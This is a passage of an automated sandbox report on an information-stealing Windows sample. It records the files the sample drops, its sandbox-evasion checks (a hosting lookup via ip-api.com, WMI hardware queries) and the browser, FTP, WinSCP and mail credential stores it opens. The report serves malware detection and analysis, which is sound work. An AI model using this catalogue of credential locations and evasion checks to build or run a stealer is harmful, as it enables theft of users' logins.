Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\podagrist.ref
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\soliloquium.bor
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\thoroughwort.ret
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\torminal.wes
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\99200032052824.bat.exe Memory allocated: 120000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\99200032052824.bat.exe Memory allocated: 37610000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\99200032052824.bat.exe Memory allocated: 37530000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\99200032052824.bat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 5_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004062A3 FindFirstFileA,FindClose, 5_2_004062A3
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004026FE FindFirstFileA, 5_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 9_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_004026FE FindFirstFileA, 9_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_004062A3 FindFirstFileA,FindClose, 9_2_004062A3
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\99200032052824.bat.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00402340 LdrInitializeThunk,GetPrivateProfileStringA, 5_2_00402340
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_73A31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 5_2_73A31A98
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\99200032052824.bat.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"
Source: C:\Users\user\Desktop\99200032052824.bat.exe Queries volume information: C:\Users\user\Desktop\99200032052824.bat.exe VolumeInformation
Source: C:\Users\user\Desktop\99200032052824.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 5_2_0040320C
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Users\user\Desktop\99200032052824.bat.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match File source: 00000009.00000002.1301032668397.0000000037647000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY